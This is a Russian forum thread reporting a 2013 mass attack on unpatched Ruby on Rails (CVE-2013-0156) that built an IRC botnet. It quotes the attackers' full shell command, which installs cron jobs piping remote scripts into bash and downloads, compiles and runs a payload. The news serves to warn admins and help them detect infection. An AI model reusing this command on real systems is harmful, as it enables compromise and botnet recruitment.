URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 90266
[ Назад ]

Исходное сообщение
"Зафиксирована массовая атака на уязвимые версии Ruby on Rails"
Отправлено opennews , 31-Май-13 10:49

В Сети зафиксирована (http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/) массовая атака на сайты, использующие устаревшие выпуски фреймворка Ruby on Rails, содержащие неисправленную уязвимость CVE-2013-0156 (https://www.opennet.ru/opennews/art.shtml?num=35792). Несмотря на то, что обновление Ruby on Rails с исправлением уязвимости было представлено ещё в январе, остаётся достаточно много систем не установивших обновление и остающихся уязвимыми. Этим и воспользовались злоумышленники, намеренные сформировать новый ботнет на базе таких систем.
После эксплуатации уязвимости на сервер устанавливается специальная вредоносная программа, принимающая управляющие команды через IRC (используется канал #rails на сервере cvv4you.ru). В списке процессов вредоносная программа выглядит как "-- bash".
Загрузка вредоносного ПО активируется через Cron. После получения доступа к атакованной системе, на ней выполняется следующий код (загрузка и сборка приложения k.c):
<font color="#461b7e">
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
</font>
Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены свежие выпуски фреймворка 3.2.13, 3.1.12 или 2.3.18. Проверить активность вредоносного приложения можно по наличию файла /tmp/tan.pid.

URL: http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/
Новость: https://www.opennet.ru/opennews/art.shtml?num=37064

Содержание

Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Анонимусссссс, 10:49 , 31-Май-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 15:13 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 17:17 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,zombardeer, 21:19 , 31-Май-13
    - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Куяврик, 14:47 , 01-Июн-13
Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 11:11 , 31-Май-13
- 'Зафиксирована массовая атака на уязвимые версии Ruby on Rail..,scorry, 11:18 , 31-Май-13
  - 'Зафиксирована массовая атака на уязвимые версии Ruby on Rail..,ВовкаОсиист, 11:42 , 31-Май-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 13:12 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,XoRe, 18:06 , 31-Май-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 09:49 , 01-Июн-13
Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,тигар, 11:22 , 31-Май-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,xdsl, 12:55 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,тигар, 12:59 , 31-Май-13
    - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 13:31 , 31-Май-13
      - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,тигар, 14:01 , 31-Май-13
        
        Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 15:02 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 13:52 , 31-Май-13
Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,ано2анон, 12:42 , 31-Май-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 13:18 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 09:51 , 01-Июн-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,GentooBoy, 16:07 , 31-Май-13
  - Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,robux, 17:34 , 31-Май-13
Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 12:50 , 31-Май-13
- Зафиксирована массовая атака на уязвимые версии Ruby on Rail...,Аноним, 09:53 , 01-Июн-13
Зафиксирована массовая атака на уязвимые версии Ruby on Rails,бедный буратино, 16:58 , 01-Июн-13

Сообщения в этом обсуждении

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Анонимусссссс , 31-Май-13 10:49

Ай, спасибо, добрый человек.
*Убежал проверяться.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 15:13

Не читаешь сесуриту рассылку и держишь компилятор на сервере? ай ай ай

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 17:17

"сесуриту" ? А это в куда?

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено zombardeer , 31-Май-13 21:19

отсутствие компилятора на сервере... как элемент защиты. виндовсятник?

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Куяврик , 01-Июн-13 14:47

> отсутствие компилятора на сервере... как элемент защиты. виндовсятник?
скорее убунтоид, если разница кого-то волнует

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 11:11

под_linux_нету_вирусов.jpg

"'Зафиксирована массовая атака на уязвимые версии Ruby on Rail.."
Отправлено scorry , 31-Май-13 11:18

Ещё один из разряда «прочитал всё, не понял ни одной буквы».

"'Зафиксирована массовая атака на уязвимые версии Ruby on Rail.."
Отправлено ВовкаОсиист , 31-Май-13 11:42

Да тут врятли дальше заголовка пошло дело.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 13:12

Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD и правда нету.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено XoRe , 31-Май-13 18:06

> Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD
> и правда нету.
Вообще есть)
Но они очень редки, в пересчете на количество пользователей/серверов.
И чаще это руткиты.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 01-Июн-13 09:49

Определение вируса (заодним и других зловредов) хоть в Википедии прочитай и заучи наизусть как устав караульной службы, если суть запомнить не можешь. Может, тебе это поможет не позориться на компьютерных форумах.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено тигар , 31-Май-13 11:22

они поломали хетзнир?
--2013-05-31 10:21:32-- http://88.198.20.247/k.c
Connecting to 88.198.20.247:80... connected.
HTTP request sent, awaiting response...
и тишина...

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено xdsl , 31-Май-13 12:55

У тебя неправильный юзерагент

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено тигар , 31-Май-13 12:59

> У тебя неправильный юзерагент
что-то я не заметил в том cronjob левого UA

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 13:31

User-Agent: Wget/1.13.4 (linux-gnu)

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено тигар , 31-Май-13 14:01

[tiger@laptop]:~%wget --user-agent="Wget/1.13.4 (linux-gnu)" http://88.198.20.247/k.c
--2013-05-31 13:00:31-- http://88.198.20.247/k.c
HTTP request sent, awaiting response... 504 Gateway Time-out
2013-05-31 13:03:31 ERROR 504: Gateway Time-out.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 15:02

уже прикрыли хосты и айпи

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 13:52

ТолстОта

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено ано2анон , 31-Май-13 12:42

Что то по тенденции руби напоминает друшлак :D

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 13:18

Как и всё, что админы поставили и оставили без внимания на длительное время.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 01-Июн-13 09:51

> Как и всё, что админы поставили и оставили без внимания на длительное
> время.
А если админа контрора берет только для внедрения, а потом фактически засылает его?

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено GentooBoy , 31-Май-13 16:07

причем тут руби? говориться про рельсы
http://www.cvedetails.com/vulnerability-list/vendor_id-10199...

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено robux , 31-Май-13 17:34

Он не знает что такое руби.
Да похоже и рельсы не знает что такое.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 31-Май-13 12:50

>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены
gcc

"Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."
Отправлено Аноним , 01-Июн-13 09:53

>>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены
> gcc
Прикинь, если выставленные наружу виндовые сервера (нам пытались такую технологию впарить). Такому серверу ничто не угрожает ... минут 15. Потом пипец.

"Зафиксирована массовая атака на уязвимые версии Ruby on Rails"
Отправлено бедный буратино , 01-Июн-13 16:58

https://jira.mongodb.org/browse/PYTHON-532